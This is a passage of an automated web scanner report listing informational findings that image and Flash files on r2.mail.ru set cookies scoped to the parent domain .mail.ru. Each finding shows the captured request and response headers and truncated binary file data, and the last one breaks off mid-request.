Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12965362.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12965362.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1986
Connection: keep-alive
Set-Cookie: p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...
16.86. http://r2.mail.ru/b12968616.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12968616.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12968616.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 7638
Connection: keep-alive
Set-Cookie: p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
16.87. http://r2.mail.ru/b12979027.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12979027.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12979027.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2333
Connection: keep-alive
Set-Cookie: p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...
16.88. http://r2.mail.ru/b13039712.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13039712.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13039712.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 1491
Connection: keep-alive
Set-Cookie: p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
16.89. http://r2.mail.ru/b13044176.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13044176.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13044176.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 2252
Connection: keep-alive
Set-Cookie: p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................    .    ..
...


......    ...........C.......................................................................2.2.."..............................
...[SNIP]...
16.90. http://r2.mail.ru/b13049054.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13049054.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13049054.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 19587
Connection: keep-alive
Set-Cookie: p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H....
FExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:39:59.........
...[SNIP]...
16.91. http://r2.mail.ru/b13050852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13050852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13050852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 15500
Connection: keep-alive
Set-Cookie: p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....TExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:43:30.........
...[SNIP]...
16.92. http://r2.mail.ru/b13057590.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13057590.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13057590.swf HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:52 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21720
Connection: keep-alive
Set-Cookie: p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:29:52 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

CWS    .x..x...u\U].7.N.-]...t..HwHs...i.)..QBP.AZ..D.E..T@QJE.l.....u...<...>...q..f......Y........p...`@..@?'.......".b.............0...a..A.h....S.u1.....P.....#..1....}...    U]....... ....'.........
...[SNIP]...
16.93. http://r2.mail.ru/b13058787.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058787.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058787.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3168
Connection: keep-alive
Set-Cookie: p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95
...C.....................................    ...    ......    


.....
.    


...C...........
...



...[SNIP]...
16.94. http://r2.mail.ru/b13058840.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058840.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058840.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1736
Connection: keep-alive
Set-Cookie: p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
16.95. http://r2.mail.ru/b13058851.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058851.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058851.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1405
Connection: keep-alive
Set-Cookie: p=r+cGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
16.96. http://r2.mail.ru/b13058852.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/jpeg
Content-Length: 1184
Connection: keep-alive
Set-Cookie: p=FPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...
16.97. http://r2.mail.ru/b13058968.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13058968.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058968.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 23542
Connection: keep-alive
Set-Cookie: p=29QGAEyt3gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:17 23:49:14.........
...[SNIP]...
16.98. http://r2.mail.ru/b13059223.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059223.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059223.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3609
Connection: keep-alive
Set-Cookie: p=RtAGAEqpQQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C....................................................................C.......................................................................2.2..".............................    
...[SNIP]...
16.99. http://r2.mail.ru/b13059860.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13059860.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13059860.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1805
Connection: keep-alive
Set-Cookie: p=EegGAJjr5wAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................2.2..
...[SNIP]...
16.100. http://r2.mail.ru/b13060405.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060405.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060405.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:24 GMT
Content-Type: image/jpeg
Content-Length: 1285
Connection: keep-alive
Set-Cookie: p=We8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:24 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:24 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2.2.."..............................
...[SNIP]...
16.101. http://r2.mail.ru/b13060487.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13060487.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13060487.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 1840
Connection: keep-alive
Set-Cookie: p=Te8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.......................

............................... "..".......C.....................................................................2.2.................................
...[SNIP]...
16.102. http://r2.mail.ru/b13061099.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b13061099.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13061099.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
